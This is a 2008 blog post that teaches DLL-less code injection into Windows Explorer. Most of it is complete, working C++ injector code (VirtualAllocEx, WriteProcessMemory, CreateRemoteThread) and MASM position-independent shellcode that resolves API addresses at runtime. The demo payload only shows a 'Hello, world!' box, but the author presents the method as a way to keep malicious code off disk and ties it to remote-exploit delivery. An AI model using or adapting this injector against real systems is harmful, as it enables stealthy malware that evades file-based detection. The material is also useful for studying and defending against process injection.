SIGTRAP: DLL-less Code Injection (...and the most complicated Hello, World! program ever written)

There is a common technique for subverting running processes on modern Windows systems known as DLL injection. I won't go into the details of it, but the basic idea is to force the target process to load a DLL containing code written by the attacker. When the DLL is loaded, its entry point function (DllMain) is called with DLL_PROCESS_ATTACH, and the DLL has a chance to do whatever it wants within the address space of the target process. This could include setting up threads to monitor the process or installing hooks on some of the process's functions to redirect execution - the opportunities for sneakiness and trickery are endless. There is plenty of information about DLL injection on the web; here's one link: http://en.wikipedia.org/wiki/DLL_injection

DLL injection is a well-known technique, and there probably isn't much interesting to say about it that hasn't already been said before. What I am going to demonstrate is something much more exciting - code injection without the use of a DLL. The advantages of this are enormous: if you can inject code into a running process without using a DLL, you can get away without ever having to touch the filesystem - the piece of injected code only needs to exist in memory. Of course, you still need to be able to run the code that does the injection (the injector code, I'll call it) somehow. In the simplest case you might choose to do this by running an executable, and that executable would need to reside on disk. But there are conceivably other ways to get your injector code running on the target system. Here's some information about a Windows TCP/IP stack vulnerability that will frighten and amaze you: http://support.microsoft.com/kb/941644
It allows remote code execution (presumably in ring 0), and it affects all modern versions of Windows, including 2000, XP, and Vista. It was made public in early 2008. That's right, 2008. Of course it is now a known vulnerability and it has been fixed, but it proves that things like this are out there. Windows almost certainly has more of them, some of which haven't been discovered yet and, scarier still, some of which people have discovered but kept to themselves.

Anyway, the basic steps to DLL-less code injection are:
1) Find the process ID of the target process.
2) Open the target process.
3) Use VirtualAllocEx to allocate a chunk of memory in the address space of the target process. The allocated memory must be marked readable, writable, and executable.
4) Use WriteProcessMemory to copy a block of code (and probably data as well) to the memory allocated in step 3.
5) Use CreateRemoteThread to start up a thread (in the address space of the target process) that will begin executing the block of code copied in step 4.

We're going to do this using an 'injector' executable, and the block of code to be injected will be built and linked into our injector program. The first thing the injector program needs is a header file declaring two pointers: one points to the beginning of the injectable code block, and the other points to the end. This is the header file codeblk.h:

#ifndef _CODEBLK_H
#define _CODEBLK_H

#ifdef __cplusplus
extern "C" {
#endif
 
extern void *codeblk_start, *codeblk_end;

#ifdef __cplusplus
}
#endif

#endif

Next is the file winject.cpp, which contains the code for finding the target process and doing the injection. For this example I use Windows Explorer (explorer.exe) as the target. This is the program that makes the Start menu appear. Windows can actually run without it, but in most cases it is running the whole time you are logged in.

//
// winject.cpp:
//   Inject the code from codeblk.asm into the Windows Explorer process.
//

#include "stdafx.h"
#include "codeblk.h"

// Convert a string (in place) to lowercase
static void strtolower(_TCHAR *s) {
    for (; *s; ++s) {
        if (*s >= 'A' && *s <= 'Z') {
            *s += ('a'-'A');
        }
    }
}

// Find the PIDs of all processes whose executable name matches the given name.
// Return them in a buffer, and return the number of pids in 'npids'. The caller
// is responsible for deallocating the returned buffer with 'free()'. The returned
// buffer will be NULL if 'npids' is 0.
static DWORD *getPids(const _TCHAR *exename, DWORD *npids) {

    #define PIDS_ALLOC_SIZE 10

    DWORD *pids = NULL;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 proc;
    DWORD pidsBufSize = 0;

    *npids = 0;
    proc.dwSize = sizeof(proc);     // Process32First() fails unless dwSize is set

    if (hsnap != INVALID_HANDLE_VALUE) {
    
        if (Process32First(hsnap, &proc)) {
            do {
                strtolower(proc.szExeFile);
                if (strcmp(proc.szExeFile, exename) == 0) {

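                    if (*npids == pidsBufSize) {
                        // Make more room for PIDs; stop collecting them if we run out of memory
                        DWORD *grown = (DWORD*)realloc(pids, (pidsBufSize + PIDS_ALLOC_SIZE)*sizeof(DWORD));
                        if (!grown) {
                            break;
                        }
                        pids = grown;
                        pidsBufSize += PIDS_ALLOC_SIZE;
                    }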

                    pids[(*npids)++] = proc.th32ProcessID;
                }
            } while (Process32Next(hsnap, &proc));
        }
        CloseHandle(hsnap);
    }

    return pids;

    #undef PIDS_ALLOC_SIZE
}

// Get the fully-qualified path to the Windows executable 'Explorer.exe'. We can't assume that
// it is on the C: drive, and we probably shouldn't assume the system directory is '\Windows' either.
static _TCHAR *getExplorerFullyQualifiedPath(DWORD *pathlen) {

    const _TCHAR *varname = "SystemRoot";
    const _TCHAR exename[] = "\\explorer.exe";
    _TCHAR *path = NULL;

    DWORD len = GetEnvironmentVariable(varname, NULL, 0);
    if (len) {
        *pathlen = len + sizeof(exename) - 1;
        path = (_TCHAR*)malloc(*pathlen);
        GetEnvironmentVariable(varname, path, len);
        strcat(path, exename);
    } else {
        // Can't think of a situation when 'SystemRoot' wouldn't be available, but...
        exit(1);
    }

    strtolower(path);
    return path;       
}

// Return the PID for Windows explorer. Returns 0 if an error occurs. One potential reason
// for failure is that explorer is not running.
static DWORD getExplorerPid(void) {
    const _TCHAR *pname = "explorer.exe";

    DWORD targetlen;
    _TCHAR *target = getExplorerFullyQualifiedPath(&targetlen);
    _TCHAR *tempPath = (_TCHAR*)malloc(targetlen);
    DWORD npids;
    DWORD epid = 0;             // PID for explorer

    // Find all matching pids
    DWORD *pids = getPids(pname, &npids);
 
    if (pids) {

        // Check fully-qualified path name for each
        for (DWORD n = 0; n < npids; ++n) {

            HANDLE hproc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pids[n]);
            if (hproc) {

                if ( GetModuleFileNameEx(hproc, NULL, tempPath, targetlen) ) {

                    strtolower(tempPath);
                    if (strcmp(tempPath, target) == 0) {
                        // Found a match
                        epid = pids[n];
                        CloseHandle(hproc);
                        break;
                    }
                }

                CloseHandle(hproc);
            }
        }

        free(pids);
    }

    free(target);
    free(tempPath);
    return epid;
}

// Open and inject code into the process with the given PID. Returns a pointer to the
// injected code (an address in the target process), or NULL if an error occurred. The
// caller is responsible for closing the process handle returned in 'hproc'.
static void *inject(DWORD pid, HANDLE *hproc) {

    void *code = NULL;
    *hproc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
                         PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (*hproc) {
        unsigned int codelen;
        __asm {
            mov eax, codeblk_end
            mov ecx, codeblk_start
            sub eax, ecx
            mov codelen, eax
        }

        // The allocated pages need to be writable so we can write the injected code to them
        // and so the injected code can store variables, and they also need to be executable
        // so the injected code can run.
        code = VirtualAllocEx(*hproc, NULL, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
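        if (code && !WriteProcessMemory(*hproc, code, codeblk_start, codelen, NULL)) {
            // Don't leave a half-written block behind if the copy failed
            VirtualFreeEx(*hproc, code, 0, MEM_RELEASE);
            code = NULL;
        }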
    }

    return code;
}

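// Start a thread in the target process at the injected code, passing it the address of
// GetProcAddress in that process. Returns the thread handle, or NULL if an error occurred.
static HANDLE runInjectedCode(void *codeblk, HANDLE hproc) {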

    if (!codeblk || !hproc) {
        return NULL;
    }

    #define MODULES_ALLOC_SIZE 1024

    // Enumerate all modules loaded by the process
    HMODULE *modules = NULL;
    DWORD nbuf = 0;
    DWORD nmod = 0;
    do {
        nbuf += MODULES_ALLOC_SIZE;
        modules = (HMODULE*)realloc(modules, nbuf);
        if (!EnumProcessModules(hproc, modules, nbuf, &nmod)) {
            if (modules) {
                free(modules);
            }
            return NULL;
        }
    } while (nmod >= nbuf);
 
    #undef MODULES_ALLOC_SIZE

    // Find kernel32.dll in the remote process. Chances are very good that it is loaded at
    // the same virtual address in our process and in the remote process, but this isn't
    // something we should depend on. Once we've found kernel32.dll, we calculate the address
    // of GetProcAddress() for the remote process.
    _TCHAR modname[sizeof("kernel32.dll")];
    FARPROC rmtGetProcAddr = NULL;
    for (unsigned int n = 0; n < nmod / sizeof(HMODULE); ++n) {
        if (GetModuleBaseName(hproc, modules[n], modname, sizeof(modname)) == sizeof(modname)-1) {
            strtolower(modname);
            if (strcmp(modname, "kernel32.dll") == 0) {

                // Get the address of the 'GetProcAddress' function in the remote process:
                //   1) Find address of 'GetProcAddress' within our address space
                //   2) Find offset of 'GetProcAddress' within kernel32.dll by subtracting our
                //      process's kernel32.dll module handle. This works because the module
                //      handle is simply the base address of the module.
                //   3) Add offset from step 2 to the kernel32.dll module handle for the remote
                //      process.
                HMODULE ourKernel32 = GetModuleHandle("kernel32");
                FARPROC ourGetProcAddr = GetProcAddress(ourKernel32, "GetProcAddress");
                if (ourKernel32 && ourGetProcAddr) {
                    HMODULE rmtKernel32 = modules[n];
                    __asm {
                        mov eax, ourGetProcAddr
                        sub eax, ourKernel32
                        add eax, rmtKernel32
                        mov rmtGetProcAddr, eax
                    }
                }

                break;
            }
        }
    }

    free(modules);

    if (!rmtGetProcAddr) {
        return NULL;
    }

    return CreateRemoteThread(hproc, NULL, 0, (LPTHREAD_START_ROUTINE)codeblk, (LPVOID)rmtGetProcAddr, 0, NULL);
}

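int _tmain(int argc, _TCHAR* argv[]) {

    DWORD pid = getExplorerPid();
    if (!pid) {
        return 1;                   // explorer.exe isn't running, or we couldn't query it
    }

    HANDLE hproc;
    void *codeblk = inject(pid, &hproc);
    HANDLE hthr = runInjectedCode(codeblk, hproc);

    if (hthr) {
        CloseHandle(hthr);
    }
    if (hproc) {
        CloseHandle(hproc);
    }

    return hthr ? 0 : 1;
}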

I'm not going to explain each line of the code, but here are a few things that are noteworthy:

1) The function 'getPids()' doesn't just find the first process whose executable name is "explorer.exe"; it finds all of them. Later we check the full path of each one to find the one in the Windows directory (%SystemRoot%, which is C:\Windows on most systems). The reason for this is that not every process named "explorer.exe" is necessarily Windows Explorer - you could easily rename one of your other applications to "explorer.exe" and run it. I like being thorough.
2) String comparisons are case-insensitive (both strings are converted to lowercase before they are compared), since Windows treats file names case-insensitively.
3) To find the address of 'GetProcAddress' within the target process, I take the distance from the beginning of kernel32.dll to 'GetProcAddress' in the injector program and add it to the base address of kernel32.dll in the target process. On Windows XP this probably isn't necessary: IIRC, kernel32.dll is always loaded at base address 0x7c800000 in every process, so all kernel32.dll functions have the same addresses in both processes and none of the arithmetic is needed. Vista, however, randomizes DLL base addresses (ASLR) for security reasons. As far as I know, system DLLs are only re-randomized at boot, so kernel32.dll should still share a base address across processes within a session, but doing the arithmetic means we don't have to depend on that. I haven't tried running this program on Vista yet.
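4) This code was written for MS Visual C++ and has to be compiled as 32-bit x86 code, since Visual C++ only supports __asm blocks on x86. My stdafx.h includes windows.h, tlhelp32.h, and psapi.h. These 3 files need to get included somehow, however you do it, and you also need to link against psapi.lib. The code also assumes a multi-byte (non-Unicode) build: it mixes _TCHAR strings with narrow string literals and functions like strcmp(), so set the project's character set to "Use Multi-Byte Character Set".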
5) I use assembly in a few places to do pointer arithmetic. You can do it with casts instead, but it looks just as dirty, and Visual Studio will bitch and moan about pointer truncation.
6) The single 4-byte argument that gets passed to the remote thread upon its creation is 'rmtGetProcAddr'. This is the address of the 'GetProcAddress' function within the target process.
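Item 5 says the pointer arithmetic can also be done with casts. As a minimal sketch (the helper name `rebase_address` is hypothetical, and it assumes `<stdint.h>` is available), casting through `uintptr_t`, an integer type as wide as a pointer, keeps the arithmetic portable and avoids the truncation warnings you get when casting pointers to `DWORD`:

```c
#include <assert.h>
#include <stdint.h>

/* Translate an address inside a module loaded at 'localBase' into the matching
 * address for the same module loaded at 'remoteBase'. This works because a
 * function sits at a fixed offset from its module's base address. */
static uintptr_t rebase_address(uintptr_t localAddr, uintptr_t localBase,
                                uintptr_t remoteBase) {
    assert(localAddr >= localBase);            /* address must lie inside the module */
    uintptr_t offset = localAddr - localBase;  /* distance from start of module */
    return remoteBase + offset;
}
```

In runInjectedCode() the call would look something like `rmtGetProcAddr = (FARPROC)rebase_address((uintptr_t)ourGetProcAddr, (uintptr_t)ourKernel32, (uintptr_t)rmtKernel32);`. With made-up bases of 0x7C800000 (local) and 0x76A00000 (remote), a local address of 0x7C80AE30 maps to 0x76A0AE30.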

Okay, so now we have a program that can inject code into explorer.exe. The only thing left is to create the code that gets injected. And this is the really ugly, difficult part. The basic problem with the injected block is that as soon as we run it within the target process, it suddenly knows nothing about what is around it. It is all alone in the unfamiliar world of another process and it has nothing with it except the little four-byte argument that was passed to CreateRemoteThread when we called it. It's tempting for us to start off our injectable code block by doing something like this:

MessageBox(NULL, "This is a test", "Test", MB_OK);

...But it is not going to be nearly that easy. That will compile and link, but the compiled code calls MessageBox through the injector program's import table, using an address that is only meaningful in the injector's address space. MessageBox may be somewhere else in the target process, and the import table doesn't get copied over anyway, so the call won't work once the code is copied. Also, the two strings "This is a test" and "Test" will be stored in a data section of the injector program, and the compiled code will refer to them by their addresses. Once the code is copied over, these addresses are meaningless and there is no way to get at the strings - they are in the data portion of a different process. There are other problems too, such as the runtime stack checks (/RTC) and security cookies (/GS) that Visual Studio inserts into your code to detect stack corruption and buffer overflows - these also depend on functions and data in the injector program that don't get copied over. These checks can be disabled, but the problem of accessing strings and other data from the injected code can't reasonably be solved with C. We will end up having no choice but to resort to assembly if we actually want to _do_ anything.

The simplest possible piece of injected code we can create just returns immediately. Here is code for MASM:

.686P
.model flat

; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE

codeblk SEGMENT

; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
   xor eax, eax
   ret 4
_threadMain ENDP

   ; This should be the last thing in the code block
   PUBLIC _codeblk_end
   PUBLIC _codeblk_start
   _codeblk_end        dd  _codeblk_end
   _codeblk_start      dd  _threadMain

codeblk ENDS
END

Not terribly interesting, but it's a start. Now, the only thing we have is the address of the 'GetProcAddress' function, so we can call that to find out where various other API functions are. But there are two problems:
1) The first argument to GetProcAddress is a module handle. We don't have any module handles.
2) The second argument to GetProcAddress is a string. We have to be able to pass the address of a string somehow.

The solution to problem 1) is a dirty, dirty hack. We know that the address of 'GetProcAddress' lies within kernel32.dll. We know that Windows always loads DLLs at base addresses that end in 0x0000, i.e. on 64 KB boundaries (or at least I think it does). Finally, we know that the function GetProcAddress appears well within the first 0x10000 bytes of kernel32.dll. This means we can just chop off the low 16 bits of the address and we have a module handle. Yay!
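In C terms, the `xor dx, dx` trick used in `_linkFunctions` below amounts to masking off the low 16 bits of the address. Here is a minimal sketch (the helper names are hypothetical and the addresses in the test are made up) that also shows where the hack breaks: if the function sat more than 0x10000 bytes into the module, the mask would land on a 64 KB boundary inside the module instead of on its base.

```c
#include <assert.h>
#include <stdint.h>

#define MODULE_ALIGNMENT 0x10000u   /* assumed 64 KB alignment of DLL base addresses */

/* Guess a module's base address from an address inside it by clearing the
 * low 16 bits, which is what 'xor dx, dx' does to the 32-bit value in edx. */
static uintptr_t guess_module_base(uintptr_t addrInModule) {
    return addrInModule & ~(uintptr_t)(MODULE_ALIGNMENT - 1);
}

/* The guess is only right when the address lies within the first 64 KB of
 * the module and the module really starts on a 64 KB boundary. */
static int guess_is_correct(uintptr_t addrInModule, uintptr_t trueBase) {
    assert(trueBase % MODULE_ALIGNMENT == 0);   /* the assumption being relied on */
    return guess_module_base(addrInModule) == trueBase;
}
```

For a module at 0x7C800000, an address 0xAE30 bytes in gives back 0x7C800000, but an address 0x12345 bytes in gives 0x7C810000, which is not the module's base.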

The solution to problem 2) involves something that we can't do with C. When we put strings in our C code, they are actually placed in a separate data section of the executable. We need the data to sit right next to the code so it all gets copied over together. When the data and code sit next to each other, the distance between them stays the same no matter where the block ends up. That is exactly what we need. If the injected code can find the absolute address of some part of itself, and if it knows the distance from there to the beginning of the data, then it can compute the absolute address of the data. A piece of code can find its own address by doing something like this:

   call GRAB_EIP     ; Pushes return address. Return address is address of GRAB_EIP
   GRAB_EIP:
   pop eax           ; Pop address of GRAB_EIP off the stack into eax

That is essentially like saying 'mov eax, eip', except that that isn't a valid instruction.
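C can't place data right next to code, but the property the trick relies on can be shown with a C analogy: the distance between two parts of a block is fixed when the block is built, so after the whole block is copied somewhere else, the data can still be found from the copy's start address. In this sketch (the `struct block` layout and the helper names are hypothetical), `offsetof` plays the role of `DATA_START-GRAB_EIP` and `memcpy` stands in for WriteProcessMemory:

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for the injected block: "code" bytes followed by the data they use. */
struct block {
    unsigned char code[16];   /* placeholder for the instructions */
    char hello[14];           /* room for "Hello, world!" and its terminator */
};

/* Distance from the start of the block to the string. Like DATA_START-GRAB_EIP,
 * it is fixed when the block is built, so it is still valid after copying. */
static const size_t HELLO_OFFSET = offsetof(struct block, hello);

/* Find the string using only the address where a copy of the block lives. */
static const char *find_hello(const unsigned char *blockBase) {
    assert(blockBase != NULL);
    return (const char *)(blockBase + HELLO_OFFSET);
}

/* Copy the block to freshly allocated memory, the way WriteProcessMemory
 * copies it into the target process. The caller frees the result. */
static unsigned char *relocate_block(const struct block *src) {
    unsigned char *copy = malloc(sizeof *src);
    if (copy != NULL) {
        memcpy(copy, src, sizeof *src);
    }
    return copy;
}
```

The copy lives at a different address from the original, yet `find_hello(copy)` still finds "Hello, world!" because only the block's start address changed, not the offset within it.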

Once we can use strings and call GetProcAddress, we're pretty much in the clear. We can use GetProcAddress to find GetModuleHandle or LoadLibrary, which means we can then get the addresses of functions from DLLs other than kernel32. The example code below demonstrates everything explained so far. It contains a table of modules and functions, and _linkFunctions loads each of the modules and fills the table in with the addresses of the functions. I call the MessageBox function to show that it works.

.686P
.model flat

; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE

MB_OK              EQU  0
MB_ICONASTERISK    EQU  040h

codeblk SEGMENT

; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
    push [esp+4]
    call _linkFunctions

    ; Display a 'Hello, world!' message box to prove our function table works
    pushd MB_OK OR MB_ICONASTERISK                     ; Type flags
    lea edx, [esp][-12]
    pushd edx                                          ; Caption (empty string). Use the address of the null HWND.
    call _getDataStartPointer
    lea ecx, [eax][helloWorldStr-DATA_START]
    push ecx                                           ; Message string
    pushd 0                                            ; HWND (null)
    add eax, pMessageBoxA-DATA_START
    call dword ptr [eax]

    xor eax, eax
    ret 4
_threadMain ENDP

; Fills in the function table. Single argument is the address of the GetProcAddress function
_linkFunctions PROC
    push ebp
    mov ebp, esp
    push ebx                                           ; Holds address of 'GetProcAddress'
    push esi                                           ; Holds address of 'LoadLibraryA'
    push edi                                           ; Holds address of data in data table
    
    ; We get a module handle (base address) for kernel32.dll by truncating the lower 16 bits
    ; from our 'GetProcAddress' pointer. This works because 'GetProcAddress' (currently) appears
    ; within the first 0x10000 bytes of kernel32, and because Windows maps DLLs to base addresses
    ; divisible by 0x10000 (or at least it always seems to - that may not even be guaranteed).
    ; This is a bit of a hack.
    mov ebx, [ebp+8]
    mov edx, ebx
    xor dx, dx
 
    call _getDataStartPointer
    mov edi, eax
    add eax, loadLibraryStr-DATA_START
    push eax                                          ; 'LoadLibrary' string
    push edx                                          ; Handle to kernel32                                   
    call ebx                                          ; Get the address of LoadLibraryA()
    mov esi, eax
 
    add edi, runtimeLinkFunctionTable-DATA_START      ; Get first module name
    
    FOR_EACH_MODULE:
    mov dx, di                                        ; These four instructions use some trickery to
    neg dl                                            ;     round edi up to the nearest dword boundary.
    and edx, 03h
    add edi, edx
    add edi, 4                                        ; Skip past module instance handle
    mov dl, [edi]
    test dl, dl                                       ; Check for empty module name
    jz FOR_EACH_MODULE_END
    push edi                                          ; Module name
    call esi                                          ; LoadLibrary
    mov [edi-4], eax                                  ; Save instance handle in the table
    push eax                                          ; Save the instance handle on the stack too
    
    FOR_EACH_FUNCTION:
    xor al, al
    or ecx, -1                                        ; ecx = 0FFFFFFFFh, so only the terminator stops the scan
    repnz scasb                                       ; Find the end of the current string
    mov dx, di                                        ; Align edi to dword boundary, just as we did above
    neg dl
    and edx, 03h
    add edi, edx
    add edi, 4                                        ; Skip past the address at the beginning of the next entry
    mov dl, [edi]
    test dl, dl                                       ; Check for empty function name
    jz FOR_EACH_FUNCTION_END
    
    push edi                                          ; Function name
    push [esp+4]                                      ; Instance handle
    call ebx                                          ; Call GetProcAddress()
    mov [edi-4], eax                                  ; Store the function address in the table
    
    jmp FOR_EACH_FUNCTION
    FOR_EACH_FUNCTION_END:
    
    pop eax
    inc edi                                            ; Go to next module
    jmp FOR_EACH_MODULE
    FOR_EACH_MODULE_END:
    
    pop edi
    pop esi
    pop ebx
    pop ebp
    ret 4
_linkFunctions ENDP

; Find an absolute address of the start of the data based on the absolute address in 
; EIP and the difference between this function's location and DATA_START.
; Returns result in eax and doesn't trash any other registers.
_getDataStartPointer PROC
    call GRAB_EIP
    GRAB_EIP:
    pop eax
    add eax, DATA_START-GRAB_EIP
    ret
_getDataStartPointer ENDP

; The data, which we keep separate although it is all part of the same code segment
DATA_START:

    loadLibraryStr             db  'LoadLibraryA',0
    helloWorldStr              db  'Hello, world!',0

    ; Functions we link to at runtime. The format is:
    ;   [instance handle for module 1][name of module 1],0
    ;   [address of function 1 from module 1][name of function 1 from module 1],0
    ;   [address of function 2 from module 1][name of function 2 from module 1],0
    ;   ...
    ;   [address of function N from module 1][name of function N from module 1],0
    ;   [dummy address (four zero bytes)], 0
    ;   [instance handle for module 2][name of module 2],0
    ;   [address of function 1 from module 2][name of function 1 from module 2],0
    ;   ...etc. One more dummy entry after the last module marks the end of the table.
    ;
    Func MACRO name
      ALIGN 4
      p&name  dd  ?
              db  '&name',0 
    ENDM
    
    ModuleFuncTable MACRO name
      ALIGN 4
      pmod&name  dd  ?
                 db  '&name',0
    ENDM
    
    TableEnd MACRO
      ALIGN 4
      db  5  dup (0)            ; Must be zero: _linkFunctions reads the fifth byte as an empty name
    ENDM
    
    ALIGN 4
    runtimeLinkFunctionTable:
        
        ModuleFuncTable  Kernel32
            Func  GetProcAddress
            Func  GetModuleHandleA
        TableEnd
 
        ModuleFuncTable  Gdi32
            Func  CreateCompatibleDC
            Func  CreateCompatibleBitmap
            Func  DeleteDC
            Func  DeleteObject
            Func  SelectObject
        TableEnd
                      
        ModuleFuncTable  Msimg32
            Func  GradientFill
        TableEnd     
                              
        ModuleFuncTable  User32
            Func  CreateWindowExA
            Func  DestroyWindow
            Func  GetDC
            Func  GetSystemMetrics
            Func  MessageBoxA
            Func  PeekMessageA
            Func  DispatchMessageA
            Func  ReleaseDC
            Func  SendMessageA
            Func  SetWindowPos
            Func  ShowWindow
        TableEnd
         
    TableEnd 


    ; This should be the last thing in the code block
    PUBLIC _codeblk_end
    PUBLIC _codeblk_start
    _codeblk_end        dd  _codeblk_end
    _codeblk_start      dd  _threadMain


codeblk ENDS
END
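To make the table format and the walk in `_linkFunctions` easier to follow, here is a C model of both. It is a sketch, not a drop-in replacement: `put_entry`, `put_end`, `link_table` and `demo_resolve` are hypothetical names, slots are 32 bits wide as in the MASM code, and the resolver is a stub that returns made-up values where the real code calls LoadLibraryA and GetProcAddress. `align4` uses the same "add (-x) & 3" rounding as the `neg dl` / `and edx, 03h` sequence.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Round up to a multiple of 4 the same way the assembly does: (-off) & 3 is
 * the number of bytes needed to reach the next dword boundary. */
static size_t align4(size_t off) { return off + ((0 - off) & 3); }

/* Append one entry like the Func/ModuleFuncTable macros: ALIGN 4, a 4-byte
 * slot (filled in at link time), then the NUL-terminated name. */
static size_t put_entry(unsigned char *buf, size_t off, const char *name) {
    size_t len = strlen(name) + 1;
    off = align4(off);
    memset(buf + off, 0, 4);
    memcpy(buf + off + 4, name, len);
    return off + 4 + len;
}

/* Append a TableEnd marker: ALIGN 4, then 5 zero bytes. */
static size_t put_end(unsigned char *buf, size_t off) {
    off = align4(off);
    memset(buf + off, 0, 5);
    return off + 5;
}

/* Stub resolver: func == NULL means "load this module". Made-up values only. */
static uint32_t demo_resolve(const char *module, const char *func) {
    (void)module;
    if (func == NULL) {
        return 0x10000000u;                       /* fake module handle */
    }
    return 0x10000000u + (uint32_t)strlen(func);  /* fake function address */
}

/* Walk the table as _linkFunctions does, storing each resolved value in the
 * slot just before its name. Returns the number of functions linked. */
static int link_table(unsigned char *buf,
                      uint32_t (*resolve)(const char *module, const char *func)) {
    size_t off = 0;
    int count = 0;
    assert(buf != NULL && resolve != NULL);
    for (;;) {
        off = align4(off) + 4;                     /* skip the module handle slot */
        const char *module = (const char *)buf + off;
        if (*module == '\0') {
            break;                                 /* the final TableEnd */
        }
        uint32_t handle = resolve(module, NULL);
        memcpy(buf + off - 4, &handle, 4);
        off += strlen(module) + 1;
        for (;;) {
            off = align4(off) + 4;                 /* skip the function address slot */
            const char *func = (const char *)buf + off;
            if (*func == '\0') {
                break;                             /* this module's TableEnd */
            }
            uint32_t addr = resolve(module, func);
            memcpy(buf + off - 4, &addr, 4);
            off += strlen(func) + 1;
            ++count;
        }
        off += 1;                                  /* like 'inc edi': step past the dummy */
    }
    return count;
}
```

The `off += 1` step matters: after the inner loop the offset is already dword-aligned, so without it the walk would not advance past the dummy entry and would read the next module's (still zero) handle slot as an empty name, ending early.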

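When it is built properly (codeblk.asm assembled with MASM and the resulting object file linked into the injector), this code should run on any XP system. It works even when explorer.exe is protected by DEP, because the memory allocated with VirtualAllocEx is marked PAGE_EXECUTE_READWRITE. I haven't tested it on Vista yet.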

Have fun!

SIGTRAP

Monday, February 04, 2008
